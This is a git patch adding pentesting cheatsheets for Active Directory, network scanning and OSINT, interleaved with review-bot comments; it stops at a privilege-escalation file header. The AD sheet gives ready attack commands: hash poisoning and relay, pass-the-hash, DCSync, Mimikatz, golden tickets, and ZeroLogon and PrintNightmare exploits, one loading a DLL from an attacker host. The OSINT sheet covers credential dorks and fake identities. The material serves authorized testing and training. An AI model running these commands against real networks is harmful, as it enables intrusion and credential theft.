From 09fb57770c06ef970af978c8f0755bb077f531e3 Mon Sep 17 00:00:00 2001 From: rpriven Date: Sun, 4 Jan 2026 02:47:19 -0700 Subject: [PATCH] Added active-directory, network-pentesting, osint, privilege-escalation, web-application-security cheatsheets --- README.md | 9 +- infosec/active-directory.md | 425 ++++++++++++++++++++++ infosec/network-pentesting.md | 425 ++++++++++++++++++++++ infosec/osint.md | 405 +++++++++++++++++++++ infosec/privilege-escalation.md | 539 ++++++++++++++++++++++++++++ infosec/web-application-security.md | 337 +++++++++++++++++ 6 files changed, 2138 insertions(+), 2 deletions(-) create mode 100644 infosec/active-directory.md create mode 100644 infosec/network-pentesting.md create mode 100644 infosec/osint.md create mode 100644 infosec/privilege-escalation.md create mode 100644 infosec/web-application-security.md diff --git a/README.md b/README.md index 137f509..e8d87b2 100644 --- a/README.md +++ b/README.md 
@@ -14,14 +14,20 @@ A collection of security, pentesting, and technical reference cheatsheets. | Cheatsheet | Description | |------------|-------------| +| [Web Application Security](infosec/web-application-security.md) | OWASP Top 10, SQLi, XSS, SSRF, and web app testing | +| [Network Pentesting](infosec/network-pentesting.md) | Nmap, Wireshark, service enumeration | +| [Privilege Escalation](infosec/privilege-escalation.md) | Linux and Windows privesc techniques | +| [Active Directory](infosec/active-directory.md) | AD attacks, Kerberoasting, BloodHound, lateral movement | +| [OSINT](infosec/osint.md) | Open source intelligence, reconnaissance, dorking | | [Pentesting Methodology](infosec/pentesting-methodology.md) | Basic methodology for pentesters | | [Penetration Testing Reporting](infosec/pentest-reporting.md) | Comprehensive guide for creating professional pentest reports | | [SOC Analyst Reference](infosec/soc-analyst.md) | Essential knowledge for Security Operations Center analysts | | [CTF Jeopardy Guide](infosec/ctf-jeopardy.md) | Techniques for solving common CTF challenge categories | | [PJPT Reference Guide](infosec/pjpt-reference.md) | Common commands and techniques for the PJPT certification | +| [CIS 18 Controls](infosec/cis_18_controls.md) | CIS Critical Security Controls reference | +| [Incident Response](infosec/incident-response.md) | Quick techniques for IR | | [GitHub Commands](infosec/github-commands.md) | Git and GitHub command reference | | [Command Line Reference](infosec/command-line-reference.md) | Cross-platform CLI commands | -| [Incident Response](infosec/incident-response.md) | Quick techniques for IR | ## AI Security 
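Review bot: the new `CIS 18 Controls` row in this table links `infosec/cis_18_controls.md`, but the patch creates no such file (the diffstat lists only README.md and the five new `infosec/*.md` cheatsheets) and the name uses underscores where every other link in the table uses hyphens (`web-application-security.md`, `incident-response.md`, `pentest-reporting.md`). Either add the file in this commit or fix the path so the README does not link to a page that may not exist. The commit subject also mentions neither the CIS row nor the move of the `Incident Response` row up the table; both are worth a line in the message.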
@@ -29,7 +35,6 @@ A collection of security, pentesting, and technical reference cheatsheets. |------------|-------------| | [AI Pentesting](ai-security/ai-pentesting.md) | Framework for testing and securing AI systems | | [Prompt Engineering](ai-security/prompt-engineering.md) | Techniques for effective LLM prompting | -| [LLM Security](ai-security/llm-security.md) | Security considerations for large language models | ## Cryptography diff --git a/infosec/active-directory.md b/infosec/active-directory.md new file mode 100644 index 0000000..a11bebe --- /dev/null +++ b/infosec/active-directory.md 
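Review bot: this hunk drops the `LLM Security` row for `ai-security/llm-security.md` from the README, but the patch does not delete that file (it is absent from the diffstat) and the commit subject says nothing about the removal. If the page is being retired, delete `ai-security/llm-security.md` in the same commit and say so in the message; if it stays, keep the row so the cheatsheet remains discoverable from the index.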
@@ -0,0 +1,425 @@ +# Active Directory Pentesting Cheatsheet + +Quick reference for Active Directory enumeration, attacks, and post-exploitation. + +--- + +## AD Overview + +### Key Components +| Component | Description | +|-----------|-------------| +| Domain Controller (DC) | Central AD server, holds NTDS.dit | +| NTDS.dit | AD database with all user hashes | +| SYSVOL | Shared folder with GPOs and scripts | +| Kerberos | Authentication protocol | +| LDAP | Directory query protocol | + +### Common Ports +| Port | Service | +|------|---------| +| 53 | DNS | +| 88 | Kerberos | +| 135 | RPC | +| 139 | NetBIOS | +| 389 | LDAP | +| 445 | SMB | +| 464 | Kerberos password change | +| 636 | LDAPS | +| 3268 | Global Catalog | +| 3389 | RDP | + +--- + +## Initial Attack Vectors + +### LLMNR/NBT-NS Poisoning + +**Concept**: Intercept failed DNS lookups to capture NTLMv2 hashes. + +```bash +# Start Responder +responder -I eth0 -rdwv + +# Wait for authentication attempts... +# Captured hash format: user::domain:challenge:response:ntlmv2 + +# Crack with hashcat +hashcat -m 5600 hash.txt rockyou.txt +``` + +**Mitigation**: Disable LLMNR and NBT-NS via GPO. + +--- + +### SMB Relay + +**Concept**: Relay captured credentials to another machine (if SMB signing is disabled). + +```bash +# 1. Check for SMB signing +crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt + +# 2. Configure Responder (disable SMB/HTTP) +# Edit /etc/responder/Responder.conf +# SMB = Off +# HTTP = Off + +# 3. Start ntlmrelayx +impacket-ntlmrelayx -tf targets.txt -smb2support + +# 4. 
Start Responder +responder -I eth0 -rdwv + +# For shell access: +impacket-ntlmrelayx -tf targets.txt -smb2support -i + +# Then connect with nc to the specified port +``` + +--- + +### IPv6 DNS Takeover + +```bash +# mitm6 spoofs as IPv6 DNS server +mitm6 -d domain.local + +# Relay with ntlmrelayx +impacket-ntlmrelayx -6 -t ldaps://dc.domain.local -wh fakewpad.domain.local -l loot +``` + +--- + +## Post-Compromise Enumeration + +### Domain Information + +```cmd +# From Windows +net user /domain +net group /domain +net group "Domain Admins" /domain +net group "Enterprise Admins" /domain +``` + +```powershell +# PowerView +. .\PowerView.ps1 +Get-Domain +Get-DomainController +Get-DomainUser +Get-DomainGroup +Get-DomainComputer +``` + +### BloodHound + +```bash +# Install +sudo apt install bloodhound neo4j + +# Start neo4j +sudo neo4j console +# Navigate to http://localhost:7474, login neo4j:neo4j, change password + +# Start BloodHound +bloodhound +``` + +```powershell +# Collect data with SharpHound +powershell -ep bypass +. .\SharpHound.ps1 +Invoke-BloodHound -CollectionMethod All -Domain domain.local -ZipFileName output.zip +``` + +```bash +# Or use bloodhound-python from Linux +bloodhound-python -u user -p 'password' -d domain.local -ns -c all +``` + +**Key Queries**: +- "Find Shortest Paths to Domain Admins" +- "Find Principals with DCSync Rights" +- "List all Kerberoastable Accounts" + +--- + +## Credential Attacks + +### Pass the Password + +```bash +# Spray password across network +crackmapexec smb 192.168.1.0/24 -u username -d DOMAIN -p 'Password123' + +# Check specific hosts +crackmapexec smb 192.168.1.100 -u username -d DOMAIN -p 'Password123' + +# Execute command +crackmapexec smb 192.168.1.100 -u user -d DOMAIN -p 'pass' -x 'whoami' + +# Get shell with psexec +impacket-psexec DOMAIN/user:'password'@192.168.1.100 +``` + +### Pass the Hash + +**Note**: Only NTLM hashes work, not NTLMv2. 
+ +```bash +# With CrackMapExec +crackmapexec smb 192.168.1.0/24 -u user -H --local-auth + +# Get shell +impacket-psexec user@192.168.1.100 -hashes +impacket-wmiexec user@192.168.1.100 -hashes + +# Example (blank LM hash) +impacket-psexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 +``` + +### Dumping Hashes + +```bash +# With credentials +impacket-secretsdump DOMAIN/user:'password'@192.168.1.100 + +# With hash +impacket-secretsdump user@192.168.1.100 -hashes + +# From DC (DCSync) +impacket-secretsdump DOMAIN/admin:'password'@DC-IP -just-dc-ntlm +``` + +### Cracking Hashes + +```bash +# NTLM hashes +hashcat -m 1000 ntlm_hashes.txt rockyou.txt + +# NTLMv2 hashes (from Responder) +hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt + +# Kerberos TGS (Kerberoasting) +hashcat -m 13100 tgs_hashes.txt rockyou.txt + +# Kerberos AS-REP (AS-REP Roasting) +hashcat -m 18200 asrep_hashes.txt rockyou.txt +``` + +--- + +## Kerberos Attacks + +### Kerberoasting + +**Concept**: Request TGS tickets for SPNs, crack service account passwords offline. + +```bash +# Get TGS tickets +impacket-GetUserSPNs DOMAIN/user:password -dc-ip -request + +# Save hash and crack +hashcat -m 13100 tgs_hash.txt rockyou.txt +``` + +```powershell +# From Windows with Rubeus +.\Rubeus.exe kerberoast /outfile:hashes.txt +``` + +**Mitigation**: Strong service account passwords, Managed Service Accounts. + +--- + +### AS-REP Roasting + +**Concept**: Get AS-REP for accounts without pre-authentication. + +```bash +# Find vulnerable accounts and get hashes +impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip -format hashcat + +# Crack +hashcat -m 18200 asrep_hash.txt rockyou.txt +``` + +--- + +### Golden Ticket + +**Concept**: Forge TGT with krbtgt hash for persistent domain access. 
+ +```bash +# Get krbtgt hash (requires DA) +impacket-secretsdump DOMAIN/admin:password@DC-IP -just-dc-user krbtgt + +# Create golden ticket +impacket-ticketer -nthash -domain-sid -domain DOMAIN administrator + +# Use ticket +export KRB5CCNAME=administrator.ccache +impacket-psexec DOMAIN/administrator@target -k -no-pass +``` + +--- + +### Silver Ticket + +**Concept**: Forge TGS for specific service with service account hash. + +```bash +# Create silver ticket for CIFS (file shares) +impacket-ticketer -nthash -domain-sid -domain DOMAIN -spn CIFS/target.domain.local user + +export KRB5CCNAME=user.ccache +impacket-smbclient //target.domain.local/share -k -no-pass +``` + +--- + +## Token Impersonation + +```powershell +# Incognito (Meterpreter) +load incognito +list_tokens -u +impersonate_token "DOMAIN\\Administrator" + +# With Mimikatz +privilege::debug +token::elevate +``` + +--- + +## Mimikatz + +```powershell +# Dump credentials +privilege::debug +sekurlsa::logonpasswords + +# DCSync attack +lsadump::dcsync /domain:domain.local /user:Administrator + +# Pass the hash +sekurlsa::pth /user:admin /domain:domain.local /ntlm: + +# Golden ticket +kerberos::golden /user:Administrator /domain:domain.local /sid: /krbtgt: /ptt + +# Dump SAM +lsadump::sam +``` + +--- + +## Lateral Movement + +### PsExec +```bash +impacket-psexec DOMAIN/user:password@target +impacket-psexec user@target -hashes +``` + +### WMIExec +```bash +impacket-wmiexec DOMAIN/user:password@target +``` + +### Evil-WinRM +```bash +evil-winrm -i target -u user -p password +evil-winrm -i target -u user -H +``` + +### SMBExec +```bash +impacket-smbexec DOMAIN/user:password@target +``` + +--- + +## Known Vulnerabilities + +### ZeroLogon (CVE-2020-1472) +```bash +# Test +python3 zerologon_tester.py DC-NAME DC-IP + +# Exploit (resets DC password to empty) +python3 cve-2020-1472-exploit.py DC-NAME DC-IP + +# Dump hashes +impacket-secretsdump -just-dc -no-pass DC-NAME\$@DC-IP +``` + +### PrintNightmare (CVE-2021-1675 
/ CVE-2021-34527) +```bash +# Check vulnerability +rpcdump.py @DC-IP | grep MS-RPRN +rpcdump.py @DC-IP | grep MS-PAR + +# Exploit +python3 CVE-2021-1675.py DOMAIN/user:password@DC-IP '\\attacker-ip\share\evil.dll' +``` + +### noPac (CVE-2021-42278 / CVE-2021-42287) +```bash +# Scanner +python3 scanner.py DOMAIN/user:password -dc-ip DC-IP + +# Exploit +python3 noPac.py DOMAIN/user:password -dc-ip DC-IP -shell +``` + +--- + +## Useful Tools + +| Tool | Purpose | +|------|---------| +| CrackMapExec | Swiss army knife for AD | +| Impacket | Python AD tools suite | +| BloodHound | AD attack path visualization | +| Mimikatz | Credential extraction | +| Rubeus | Kerberos abuse | +| PowerView | PowerShell AD recon | +| Evil-WinRM | WinRM shell | +| Responder | LLMNR/NBT-NS poisoning | +| kerbrute | Kerberos brute forcing | + +--- + +## Attack Flow + +``` +1. LLMNR/NBT-NS Poisoning + ↓ +2. Crack hashes / Relay attacks + ↓ +3. Enumerate with BloodHound + ↓ +4. Kerberoast service accounts + ↓ +5. Lateral movement (Pass the Hash/Password) + ↓ +6. Find path to Domain Admin + ↓ +7. DCSync for all hashes + ↓ +8. Golden Ticket for persistence +``` + +--- + +## Resources + +- [WADComs](https://wadcoms.github.io/) - AD command reference +- [HackTricks AD](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology) +- [PayloadsAllTheThings AD](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md) +- [The Hacker Recipes](https://www.thehacker.recipes/) +- [ired.team](https://www.ired.team/) diff --git a/infosec/network-pentesting.md b/infosec/network-pentesting.md new file mode 100644 index 0000000..5407782 --- /dev/null +++ b/infosec/network-pentesting.md 
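Review bot: the ZeroLogon block in active-directory.md stops at the exploit and `impacket-secretsdump -just-dc -no-pass DC-NAME\$@DC-IP`; the comment itself says the exploit resets the DC machine-account password to empty, and leaving it that way breaks the DC's own Netlogon and replication, so add the restore step (run secretsdump without `-just-dc` once you have domain admin, take the `plain_password_hex` value for the `DC-NAME$` account, and put it back with the `restorepassword.py` that ships with the usual CVE-2020-1472 exploit repo) and a warning that this is not something to run against a production DC. Two smaller points: `hashcat -m 13100` in the cracking section only covers RC4 Kerberoast tickets (`$krb5tgs$23$`), AES-encrypted tickets need `-m 19600` or `19700`; and the Golden/Silver Ticket examples run `impacket-psexec ... -k -no-pass` against `target`, which has to be the host's DNS name rather than an IP, otherwise the Kerberos SPN lookup fails.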
@@ -0,0 +1,425 @@ +# Network Pentesting Cheatsheet + +Quick reference for network reconnaissance, port scanning, and traffic analysis. + +--- + +## Nmap + +### Basic Scans +```bash +# Quick scan +nmap + +# Version detection +nmap -sV + +# OS detection +nmap -O + +# Aggressive scan (OS, version, scripts, traceroute) +nmap -A + +# All ports +nmap -p- + +# Specific ports +nmap -p 80,443,8080 + +# Port range +nmap -p 1-1000 +``` + +### Scan Types +```bash +# TCP SYN (stealth) - default, requires root +nmap -sS + +# TCP connect - no root needed +nmap -sT + +# UDP scan +nmap -sU + +# Combined TCP/UDP +nmap -sS -sU + +# NULL scan (no flags) +nmap -sN + +# FIN scan +nmap -sF + +# Xmas scan (URG, PSH, FIN) +nmap -sX +``` + +### Speed and Timing +```bash +# Timing templates (0=paranoid, 5=insane) +nmap -T0 # Slowest, IDS evasion +nmap -T3 # Normal (default) +nmap -T4 # Aggressive +nmap -T5 # Fastest + +# Rate limiting +nmap --min-rate 1000 +nmap --max-rate 100 +``` + +### Output Formats +```bash +# Normal output +nmap -oN scan.txt + +# Grepable output +nmap -oG scan.grep + +# XML output +nmap -oX scan.xml + +# All formats +nmap -oA scan +``` + +### NSE Scripts +```bash +# Default scripts +nmap -sC +nmap --script=default + +# Specific script +nmap --script=http-title + +# Script categories +nmap --script=vuln +nmap --script=safe +nmap --script=discovery + +# Multiple scripts +nmap --script=http-title,http-headers + +# Wildcard +nmap --script=http-* + +# Script help +nmap --script-help=http-title +``` + +### Common Script Categories +| Category | Description | +|----------|-------------| +| auth | Authentication bypass | +| broadcast | Network discovery | +| brute | Brute force attacks | +| default | Safe, useful scripts | +| discovery | Information gathering | +| exploit | Exploit vulnerabilities | +| fuzzer | Fuzzing tests | +| safe | Won't crash targets | +| vuln | Vulnerability scanning | + +### Firewall Evasion +```bash +# Fragment packets (8 bytes) +nmap -f + +# Fragment 
packets (16 bytes) +nmap -ff + +# Custom MTU (must be multiple of 8) +nmap --mtu 24 + +# Decoy scan +nmap -D RND:10 +nmap -D decoy1,decoy2,ME + +# Spoof source port +nmap -g 53 +nmap --source-port 80 + +# Skip ping (assume host is up) +nmap -Pn + +# Custom user agent +nmap --script-args http.useragent="Mozilla/5.0" + +# Scan delay (evade rate limiting) +nmap --scan-delay 1s + +# Bad checksum (test firewall response) +nmap --badsum +``` + +### Host Discovery +```bash +# Ping sweep +nmap -sn 192.168.1.0/24 + +# ARP scan (local network) +nmap -PR 192.168.1.0/24 + +# List scan (no probe, DNS only) +nmap -sL 192.168.1.0/24 + +# TCP SYN ping +nmap -PS22,80,443 + +# TCP ACK ping +nmap -PA80,443 + +# UDP ping +nmap -PU53 +``` + +### Favorite Commands +```bash +# Comprehensive scan +nmap -A -vv -sV -sC -oA scan + +# OSCP-style initial +nmap -sV -sC -oN initial.txt + +# Full port scan +nmap -T4 -sS -Pn -p- -oN allports.txt + +# Quick top 1000 +nmap -sV -sC -T4 + +# Vuln scan +nmap --script=vuln -oN vulns.txt +``` + +--- + +## Wireshark + +### Display Filters + +#### IP Filtering +``` +ip.addr == 192.168.1.1 # Traffic to/from IP +ip.src == 192.168.1.1 # Source IP +ip.dst == 192.168.1.1 # Destination IP +ip.addr == 192.168.1.0/24 # Subnet +ip.addr != 192.168.1.1 # Exclude IP +``` + +#### Port Filtering +``` +tcp.port == 80 # TCP port 80 +udp.port == 53 # UDP port 53 +tcp.port == 80 || tcp.port == 443 # HTTP or HTTPS +tcp.dstport == 443 # Destination port +tcp.srcport == 8080 # Source port +``` + +#### Protocol Filtering +``` +http # HTTP traffic +dns # DNS traffic +tcp # TCP traffic +udp # UDP traffic +icmp # ICMP traffic +arp # ARP traffic +ssl || tls # Encrypted traffic +``` + +#### TCP Flags +``` +tcp.flags.syn == 1 # SYN packets +tcp.flags.syn == 1 && tcp.flags.ack == 0 # SYN only +tcp.flags.reset == 1 # RST packets +tcp.flags == 0x002 # SYN flag +tcp.flags == 0x012 # SYN-ACK +``` + +#### HTTP Filtering +``` +http.request # HTTP requests +http.response # HTTP responses 
+http.request.method == "GET" # GET requests +http.request.method == "POST" # POST requests +http.host contains "google" # Host contains +http.response.code == 200 # Status code +http.request.uri contains "login" # URI contains +``` + +#### Content Filtering +``` +frame contains "password" # Frame contains string +http contains "admin" # HTTP contains +tcp contains "secret" # TCP contains +``` + +### Analysis Filters +``` +# Bad TCP +tcp.analysis.flags && !tcp.analysis.window_update + +# Retransmissions +tcp.analysis.retransmission + +# Slow round trip +tcp.analysis.initial_rtt > 1 + +# TCP delays +tcp.time_delta > 0.1 + +# Slow HTTP +http.time > 0.025 + +# Slow DNS +dns.time > 1 + +# Suspicious TTL +ip.ttl < 50 && ip.ttl > 30 + +# Filter out noise +!(eth.addr == ff:ff:ff:ff:ff:ff || arp || icmp || stp || cdp || lldp) +``` + +### Special Operators +``` +contains # Substring match (case-sensitive) +matches # Regex match +in {range} # Range match +``` + +#### Examples +``` +frame contains "google" +http.host matches "\.(org|com|net)" +tcp.port in {80 443 8000..8004} +``` + +### CLI Tools + +#### dumpcap +```bash +# List interfaces +dumpcap -D + +# Capture on interface +dumpcap -i 1 -w capture.pcapng + +# Ring buffer (10 files, 500MB each) +dumpcap -i 1 -w capture.pcapng -b filesize:500000 -b files:10 +``` + +#### tcpdump +```bash +# Capture all traffic +tcpdump -i eth0 + +# Capture to file +tcpdump -i eth0 -w capture.pcap + +# Read from file +tcpdump -r capture.pcap + +# Filter by host +tcpdump host 192.168.1.1 + +# Filter by port +tcpdump port 80 + +# Filter by protocol +tcpdump icmp +tcpdump tcp + +# Verbose output +tcpdump -v -i eth0 +tcpdump -vvv -i eth0 +``` + +#### tshark +```bash +# Capture +tshark -i eth0 -w capture.pcap + +# Read and filter +tshark -r capture.pcap -Y "http" + +# Extract fields +tshark -r capture.pcap -T fields -e ip.src -e ip.dst +``` + +--- + +## Service Enumeration + +### Common Ports +| Port | Service | Enumeration | 
+|------|---------|-------------| +| 21 | FTP | `nmap --script=ftp-* -p21` | +| 22 | SSH | `nmap --script=ssh-* -p22` | +| 23 | Telnet | `nmap --script=telnet-* -p23` | +| 25 | SMTP | `nmap --script=smtp-* -p25` | +| 53 | DNS | `nmap --script=dns-* -p53` | +| 80 | HTTP | `nmap --script=http-* -p80` | +| 110 | POP3 | `nmap --script=pop3-* -p110` | +| 139/445 | SMB | `nmap --script=smb-* -p139,445` | +| 143 | IMAP | `nmap --script=imap-* -p143` | +| 443 | HTTPS | `nmap --script=ssl-*,http-* -p443` | +| 3306 | MySQL | `nmap --script=mysql-* -p3306` | +| 3389 | RDP | `nmap --script=rdp-* -p3389` | +| 5432 | PostgreSQL | `nmap --script=pgsql-* -p5432` | + +### SMB Enumeration +```bash +# Enum shares +smbclient -L // -N +nmap --script=smb-enum-shares -p445 + +# Connect to share +smbclient ///share -U username + +# Enum users +nmap --script=smb-enum-users -p445 + +# Check for vulnerabilities +nmap --script=smb-vuln-* -p445 + +# CrackMapExec +crackmapexec smb +crackmapexec smb --shares +crackmapexec smb -u user -p pass +``` + +### DNS Enumeration +```bash +# Zone transfer +dig axfr @ +nmap --script=dns-zone-transfer -p53 + +# Reverse lookup +dig -x + +# DNS brute force +nmap --script=dns-brute +``` + +--- + +## Useful Tools + +| Tool | Purpose | +|------|---------| +| nmap | Port scanning, service detection | +| masscan | Fast port scanning | +| Wireshark | Packet analysis | +| tcpdump | CLI packet capture | +| netcat | Network Swiss army knife | +| CrackMapExec | SMB/AD enumeration | +| enum4linux | SMB/Samba enumeration | +| Responder | LLMNR/NBT-NS poisoning | + +--- + +## Resources + +- [Nmap Book](https://nmap.org/book/) +- [Nmap Scripting Engine](https://nmap.org/nsedoc/) +- [Wireshark User Guide](https://www.wireshark.org/docs/wsug_html/) +- [Wireshark Display Filters](https://wiki.wireshark.org/DisplayFilters) diff --git a/infosec/osint.md b/infosec/osint.md new file mode 100644 index 0000000..392afbe --- /dev/null +++ b/infosec/osint.md 
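Review bot: the Wireshark IP-filter block in network-pentesting.md documents `ip.addr != 192.168.1.1` as "Exclude IP", but that only holds on Wireshark 3.6 and later, where `!=` was redefined to mean `!(a == b)`; on older builds `ip.addr` matches both `ip.src` and `ip.dst`, so the expression is true for almost every packet, including those to and from that host. `!(ip.addr == 192.168.1.1)` works on every version and is the form to document. Also, the "Suspicious TTL" filter `ip.ttl < 50 && ip.ttl > 30` is not a meaningful indicator on its own (a normal Linux host a dozen hops away lands in that range), so either say what it is meant to catch or drop it; and the NSE wildcards in the Common Ports table (`--script=ssh-*`) should be quoted (`--script='ssh-*'`) so the shell cannot glob them.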
@@ -0,0 +1,405 @@ +# OSINT Cheatsheet + +Quick reference for Open Source Intelligence gathering, reconnaissance, and information discovery. + +--- + +## Search Engine Operators + +### Google Dorking + +| Operator | Description | Example | +|----------|-------------|---------| +| `site:` | Search within site | `site:example.com` | +| `filetype:` | Find file types | `filetype:pdf` | +| `intitle:` | Search in title | `intitle:"index of"` | +| `inurl:` | Search in URL | `inurl:admin` | +| `intext:` | Search in body | `intext:password` | +| `cache:` | Cached version | `cache:example.com` | +| `"..."` | Exact match | `"admin login"` | +| `*` | Wildcard | `"admin * password"` | +| `-` | Exclude | `site:example.com -www` | +| `OR` | Either term | `admin OR login` | +| `..` | Number range | `$100..$500` | + +### Useful Dorks +``` +# Find exposed directories +intitle:"index of" "parent directory" + +# Find login pages +inurl:login OR inurl:admin OR inurl:portal + +# Find exposed files +site:example.com filetype:pdf OR filetype:doc OR filetype:xls + +# Find config files +filetype:env OR filetype:cfg OR filetype:conf + +# Find backup files +filetype:bak OR filetype:old OR filetype:backup + +# Find exposed databases +filetype:sql "insert into" OR "create table" + +# Find credentials +intext:password filetype:log +"username" "password" filetype:csv + +# Find vulnerable pages +inurl:php?id= +inurl:index.php?id= +``` + +### Other Search Engines +- **Bing**: Similar operators, sometimes different results +- **DuckDuckGo**: Privacy-focused, `site:`, `filetype:` +- **Yandex**: Better for Russian/Eastern European content +- **Baidu**: Chinese content + +--- + +## Domain & Website OSINT + +### DNS & Whois +```bash +# Whois lookup +whois example.com + +# DNS records +dig example.com ANY +dig example.com MX +dig example.com TXT +nslookup -type=any example.com + +# Zone transfer (if allowed) +dig axfr @ns1.example.com example.com +``` + +### Online Tools +| Tool | URL | Purpose | 
+|------|-----|---------| +| ViewDNS | viewdns.info | DNS, IP, whois | +| SecurityTrails | securitytrails.com | Historical DNS | +| DNSDumpster | dnsdumpster.com | DNS recon | +| crt.sh | crt.sh | Certificate transparency | +| Shodan | shodan.io | Internet-connected devices | +| Censys | censys.io | Similar to Shodan | +| BuiltWith | builtwith.com | Technology profiler | +| Wappalyzer | wappalyzer.com | Tech detection | +| Wayback Machine | web.archive.org | Historical snapshots | + +### Subdomain Enumeration +```bash +# Amass +amass enum -d example.com + +# Subfinder +subfinder -d example.com + +# Sublist3r +sublist3r -d example.com + +# Certificate transparency +curl -s "https://crt.sh/?q=%.example.com&output=json" | jq -r '.[].name_value' | sort -u + +# DNS brute force +gobuster dns -d example.com -w wordlist.txt +``` + +### Technology Detection +```bash +# Whatweb +whatweb example.com + +# Wappalyzer CLI +wappalyzer https://example.com +``` + +--- + +## Email OSINT + +### Email Verification +| Tool | URL | +|------|-----| +| Hunter.io | hunter.io | +| EmailHippo | emailhippo.com | +| Verify Email | verify-email.org | +| Email-Checker | email-checker.net | + +### Email Discovery +```bash +# theHarvester +theHarvester -d example.com -b all + +# Hunter.io API +curl "https://api.hunter.io/v2/domain-search?domain=example.com&api_key=YOUR_KEY" +``` + +### Email Header Analysis +| Tool | URL | +|------|-----| +| MXToolbox | mxtoolbox.com/EmailHeaders.aspx | +| Google Admin Toolbox | toolbox.googleapps.com/apps/messageheader | + +--- + +## Username & People OSINT + +### Username Search +| Tool | URL | Purpose | +|------|-----|---------| +| Namechk | namechk.com | Username availability | +| WhatsMyName | whatsmyname.app | Cross-platform search | +| Sherlock | github.com/sherlock-project | CLI username search | +| Maigret | github.com/soxoj/maigret | Sherlock alternative | + +```bash +# Sherlock +python3 sherlock username + +# Maigret +maigret username +``` + +### People 
Search +| Tool | Purpose | +|------|---------| +| Pipl | People search engine | +| Spokeo | US people search | +| BeenVerified | Background checks | +| ThatsThem | Free people search | +| TruePeopleSearch | Free US lookup | +| Webmii | Aggregated web presence | + +### Social Media +| Platform | OSINT Approach | +|----------|----------------| +| LinkedIn | Company employees, roles, connections | +| Twitter/X | Public posts, followers, connections | +| Facebook | Public profiles, photos, check-ins | +| Instagram | Photos, locations, stories | +| GitHub | Code, email in commits, contributions | + +--- + +## Image OSINT + +### Reverse Image Search +| Tool | URL | +|------|-----| +| Google Images | images.google.com | +| TinEye | tineye.com | +| Yandex Images | yandex.com/images | +| Bing Images | bing.com/images | + +### Metadata Extraction +```bash +# ExifTool +exiftool image.jpg + +# View GPS coordinates +exiftool -gpslatitude -gpslongitude image.jpg + +# Remove metadata +exiftool -all= image.jpg +``` + +### Geolocation +| Tool | URL | +|------|-----| +| GeoGuessr | geoguessr.com | +| Google Earth | earth.google.com | +| Mapillary | mapillary.com | +| SunCalc | suncalc.org | + +--- + +## Password & Breach OSINT + +### Breach Databases +| Tool | URL | Notes | +|------|-----|-------| +| Have I Been Pwned | haveibeenpwned.com | Check if email breached | +| DeHashed | dehashed.com | Paid breach search | +| LeakCheck | leakcheck.io | Email/username search | +| IntelX | intelx.io | Multiple data types | +| Snusbase | snusbase.com | Breach database | + +### Password Policy Discovery +```bash +# Check password policies in AD +crackmapexec smb target -u user -p pass --pass-pol +``` + +--- + +## Business & Company OSINT + +### Company Information +| Tool | URL | Purpose | +|------|-----|---------| +| OpenCorporates | opencorporates.com | Global company database | +| Crunchbase | crunchbase.com | Startup/company info | +| LinkedIn | linkedin.com | Employees, structure | +| SEC 
EDGAR | sec.gov/edgar | US public filings | +| Companies House | companieshouse.gov.uk | UK company data | + +### Financial +| Tool | URL | +|------|-----| +| Bloomberg | bloomberg.com | +| Yahoo Finance | finance.yahoo.com | +| Google Finance | google.com/finance | + +--- + +## Network & Infrastructure OSINT + +### Shodan +```bash +# CLI +shodan search "hostname:example.com" +shodan host 1.2.3.4 + +# Common queries +org:"Target Company" +hostname:example.com +port:22 +product:Apache +ssl.cert.subject.cn:example.com +``` + +### Censys +```bash +# Search syntax +services.http.response.html_title:"Example" +ip:1.2.3.4 +autonomous_system.name:"Example ISP" +``` + +### BGP & ASN +| Tool | URL | +|------|-----| +| BGP.he.net | bgp.he.net | +| ASN Lookup | asnlookup.com | +| BGPView | bgpview.io | + +--- + +## Wireless OSINT + +| Tool | URL | Purpose | +|------|-----|---------| +| Wigle | wigle.net | WiFi network database | +| WifiMap | wifimap.io | WiFi passwords | + +--- + +## OSINT Tools - CLI + +### theHarvester +```bash +# All sources +theHarvester -d example.com -b all + +# Specific sources +theHarvester -d example.com -b google,linkedin,twitter +``` + +### Recon-ng +```bash +# Start +recon-ng + +# Install modules +marketplace search +marketplace install all + +# Set workspace +workspaces create example +db insert domains +domains add example.com + +# Run modules +modules load recon/domains-hosts/hackertarget +run +``` + +### SpiderFoot +```bash +# Run scan +spiderfoot -s example.com -o output.html +``` + +### Maltego +- GUI-based relationship mapping +- Entity transformations +- Visualize connections + +--- + +## OSINT Workflow + +``` +1. Define scope and objectives + ↓ +2. Passive reconnaissance + - Search engines + - Social media + - Public records + ↓ +3. Domain/Infrastructure + - DNS, Whois + - Subdomains + - Technology stack + ↓ +4. People/Organization + - Employees + - Email addresses + - Usernames + ↓ +5. 
Breach data + - Exposed credentials + - Data leaks + ↓ +6. Document findings + - Organize data + - Create report +``` + +--- + +## Sock Puppets + +### Creating Fake Identities +- Use AI-generated photos (thispersondoesnotexist.com) +- Create dedicated email (ProtonMail) +- Use VPN/Tor +- Build history over time +- Keep consistent persona + +### Operational Security +- Separate browser/profile +- No real personal info +- Different IP addresses +- Avoid linking accounts + +--- + +## Resources + +### Websites +- [OSINT Framework](https://osintframework.com/) +- [IntelTechniques](https://inteltechniques.com/) +- [OSINT Dojo](https://www.osintdojo.com/) +- [Bellingcat](https://www.bellingcat.com/) + +### Books +- "Open Source Intelligence Techniques" by Michael Bazzell +- "The OSINT Handbook" by Dale Meredith + +### Training +- [TCM Security OSINT Fundamentals](https://academy.tcm-sec.com/) +- [SANS SEC487](https://www.sans.org/cyber-security-courses/open-source-intelligence-gathering/) diff --git a/infosec/privilege-escalation.md b/infosec/privilege-escalation.md new file mode 100644 index 0000000..5de5e04 --- /dev/null +++ b/infosec/privilege-escalation.md 
